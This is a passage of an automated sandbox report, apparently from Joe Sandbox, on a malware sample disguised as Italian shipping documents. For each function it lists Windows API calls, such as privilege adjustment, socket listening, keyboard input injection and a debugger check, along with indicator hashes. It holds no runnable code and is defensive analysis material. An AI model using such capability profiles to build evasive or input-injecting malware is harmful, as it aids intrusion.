                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                        • String ID: SeShutdownPrivilege
                        • API String ID: 2938487562-3733053543
                        • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                        • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                        • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                        • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                        Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                          • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                          • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                          • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                        • GetLengthSid.ADVAPI32(?), ref: 004461D0
                        • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                        • GetLengthSid.ADVAPI32(?), ref: 00446241
                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                        • CopySid.ADVAPI32(00000000), ref: 00446271
                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 1255039815-0
                        • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                        • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                        • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                        • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                        Function 0043305F Relevance: 16.6, APIs: 11, Instructions: 122COMMON
                        Download Yara Rule
                        APIs
                        • __swprintf.LIBCMT ref: 00433073
                        • __swprintf.LIBCMT ref: 00433085
                        • __wcsicoll.LIBCMT ref: 00433092
                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                        • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                        • LockResource.KERNEL32(00000000), ref: 004330CA
                        • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                        • LoadResource.KERNEL32(?,00000000), ref: 00433105
                        • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                        • LockResource.KERNEL32(?), ref: 00433120
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                        • String ID:
                        • API String ID: 1158019794-0
                        • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                        • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                        • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                        • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                        Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                        • String ID:
                        • API String ID: 1737998785-0
                        • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                        • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                        • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                        • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                        Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                        Download Yara Rule
                        APIs
                        • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                        • GetLastError.KERNEL32 ref: 0045D6BF
                        • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Error$Mode$DiskFreeLastSpace
                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                        • API String ID: 4194297153-14809454
                        • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                        • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                        • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                        • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                        Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$_strncmp
                        • String ID: @oH$\$^$h
                        • API String ID: 2175499884-3701065813
                        • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                        • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                        • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                        • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                        Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                        Download Yara Rule
                        APIs
                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                        • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                        • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                        • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                        • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                        • listen.WSOCK32(00000000,00000005), ref: 00465381
                        • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                        • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLast$closesocket$bindlistensocket
                        • String ID:
                        • API String ID: 540024437-0
                        • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                        • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                        • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                        • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                        Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                        • API String ID: 0-2872873767
                        • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                        • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                        • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                        • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                        Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                        • __wsplitpath.LIBCMT ref: 00475644
                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                        • _wcscat.LIBCMT ref: 00475657
                        • __wcsicoll.LIBCMT ref: 0047567B
                        • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                        • CloseHandle.KERNEL32(00000000), ref: 004756BA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                        • String ID:
                        • API String ID: 2547909840-0
                        • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                        • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                        • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                        • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                        Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                        • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                        • Sleep.KERNEL32(0000000A), ref: 0045250B
                        • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                        • FindClose.KERNEL32(?), ref: 004525FF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                        • String ID: *.*$\VH
                        • API String ID: 2786137511-2657498754
                        • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                        • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                        • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                        • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                        Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                        • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                        • TerminateProcess.KERNEL32(00000000), ref: 00422004
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                        • String ID: pqI
                        • API String ID: 2579439406-2459173057
                        • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                        • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                        • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                        • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                        Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                        Download Yara Rule
                        APIs
                        • __wcsicoll.LIBCMT ref: 00433349
                        • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                        • __wcsicoll.LIBCMT ref: 00433375
                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: __wcsicollmouse_event
                        • String ID: DOWN
                        • API String ID: 1033544147-711622031
                        • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                        • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                        • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                        • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                        Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetKeyboardState.USER32(?), ref: 0044C3D2
                        • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                        • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                        • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                        • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: KeyboardMessagePostState$InputSend
                        • String ID:
                        • API String ID: 3031425849-0
                        • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                        • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                        • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                        • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                        Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                        • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                        • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ErrorLastinet_addrsocket
                        • String ID:
                        • API String ID: 4170576061-0
                        • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                        • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                        • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                        • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                        Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                        • IsWindowVisible.USER32 ref: 0047A368
                        • IsWindowEnabled.USER32 ref: 0047A378
                        • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                        • IsIconic.USER32 ref: 0047A393
                        • IsZoomed.USER32 ref: 0047A3A1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
